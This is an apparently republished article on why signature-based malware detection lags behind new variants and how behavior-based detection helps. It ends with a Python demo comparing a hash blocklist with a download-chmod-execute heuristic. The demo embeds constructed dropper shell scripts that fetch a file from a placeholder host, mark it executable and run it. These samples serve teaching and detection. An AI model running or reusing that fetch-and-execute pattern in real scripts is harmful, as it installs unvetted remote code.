
The Early Bird Gets the Virus


Reactive security measures are often not enough to protect your systems from malware. Read on for a quick look at how to make your malware defenses more proactive.


Most people have heard the proverb, "The early bird gets the worm." Fewer have heard the follow-up: "But the second mouse gets the cheese." The second line describes the current state of virus and malware detection rather well.

Today, most established antivirus and anti-malware products rely on signature-based detection: they scan files against a database of signatures extracted from known malicious samples. This works well against malware that has already been catalogued. But, as with the mice in the proverb, someone has to spring the trap before the cheese becomes obtainable. An enterprise that relies on these products is effectively hoping that some other organization encounters each new piece of malware first, analyzes it, and gets a signature published, and that the update arrives before the same malware reaches them.

A further problem is the strictness of the matching. Many signatures are cryptographic hashes (such as SHA-256) or fixed byte patterns computed from the contents of known malicious files, and a hash matches only a byte-for-byte identical file. Changing a single byte, whether by appending a comment, re-packing a binary, or renaming a string, produces a completely different hash and therefore a sample the blocklist has never seen. Attackers automate exactly this, generating variants faster than signatures can be published. The result is that signature-based detection is by construction reactive and always a step behind.

More and more, organizations are turning to behavior-based anti-malware solutions. Their advantage is that they do not require a sacrificial lamb (or mouse) to establish that a file is dangerous. Instead, they examine a large set of file characteristics and observed behaviors, such as a script that downloads a payload, marks it executable, and runs it, and flag the pattern regardless of the exact bytes involved. Because detection does not hinge on an exact signature, trivially altered variants of known malware are much harder to slip past. Behavior-based tools have their own blind spots (malware that recognizes a sandbox and stays dormant, and a higher false-positive rate that needs tuning), so in practice they complement rather than replace signature matching. Still, the conclusion is simple: implemented and tuned well, a behavior-based solution that catches previously unseen malware should let any early bird, mouse, or human feel a good deal safer.
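The contrast drawn in the two paragraphs above, the brittleness of hash signatures and the resilience of a behavior-style check, is easy to see in a few lines of code. The following is an added example written for this article, not code from the original post or from any product. The "malware" is a constructed, harmless shell script that mimics a dropper (download a file, mark it executable, run it); the hash blocklist, the variant, and the download-then-execute heuristic are all assumptions made for the demonstration. The behavioral check here is a static scan for the pattern rather than a runtime sandbox, which is the simplest form of the characteristic-based detection the text describes.

```python
import hashlib
import shlex

# Constructed sample standing in for a known malicious dropper script (harmless, never run).
KNOWN_SAMPLE = b"""#!/bin/sh
curl -s http://example.invalid/p -o /tmp/.cache
chmod +x /tmp/.cache
/tmp/.cache &
"""

# A trivially edited variant of the same dropper: one added comment and a renamed drop path.
VARIANT = b"""#!/bin/sh
# updated
curl -s http://example.invalid/p -o /tmp/.sess
chmod +x /tmp/.sess
/tmp/.sess &
"""

# A constructed benign script: it downloads a file but never executes it.
BENIGN = b"""#!/bin/sh
curl -s https://example.invalid/report.json -o /tmp/report.json
cat /tmp/report.json
"""


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Signature-based detection: an exact hash match against a blocklist of known samples.
# (Assumed blocklist: only the one sample above has ever been "seen".)
SIGNATURE_BLOCKLIST = {sha256(KNOWN_SAMPLE)}


def signature_detect(data: bytes) -> bool:
    return sha256(data) in SIGNATURE_BLOCKLIST


def _is_executable_mode(mode: str) -> bool:
    # Accept symbolic modes containing 'x' (e.g. +x, u+x) and octal modes with any x bit set.
    if "x" in mode:
        return True
    return mode.isdigit() and bool(int(mode, 8) & 0o111)


# Behavior-based detection: flag the chain download -> chmod +x -> execute on the same
# path, whatever the surrounding bytes look like. State is tracked across lines.
def behavior_detect(data: bytes) -> bool:
    downloaded = set()   # paths written by a downloader
    executable = set()   # downloaded paths later marked executable
    for raw in data.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            argv = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes: skip the line rather than crash
        if not argv:
            continue
        cmd = argv[0]
        if cmd in ("curl", "wget"):
            # curl -o <path> / wget -O <path>: remember where the payload lands
            for flag in ("-o", "-O"):
                if flag in argv:
                    idx = argv.index(flag)
                    if idx + 1 < len(argv):
                        downloaded.add(argv[idx + 1])
        elif cmd == "chmod" and len(argv) >= 3 and _is_executable_mode(argv[1]):
            for path in argv[2:]:
                if path in downloaded:
                    executable.add(path)
        elif cmd in executable:
            return True  # a downloaded, chmod'ed file is being executed
    return False


def compare(samples: dict) -> dict:
    """Return {name: (signature_hit, behavior_hit)} for each sample."""
    return {name: (signature_detect(d), behavior_detect(d)) for name, d in samples.items()}


if __name__ == "__main__":
    results = compare({"known": KNOWN_SAMPLE, "variant": VARIANT, "benign": BENIGN})
    for name, (sig, beh) in results.items():
        print(f"{name:8s} signature={sig!s:5s} behavior={beh}")
```

Running it shows the known sample caught by both checks, the one-comment variant missed by the hash blocklist but still caught by the download-then-execute heuristic, and the benign downloader caught by neither. The heuristic is deliberately narrow; a real product scores many such characteristics together, and a variant that splits the chain across scripts or obfuscates the commands would need further rules, which is exactly why behavior-based detection is tuned rather than simply switched on.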



Published at DZone with permission of

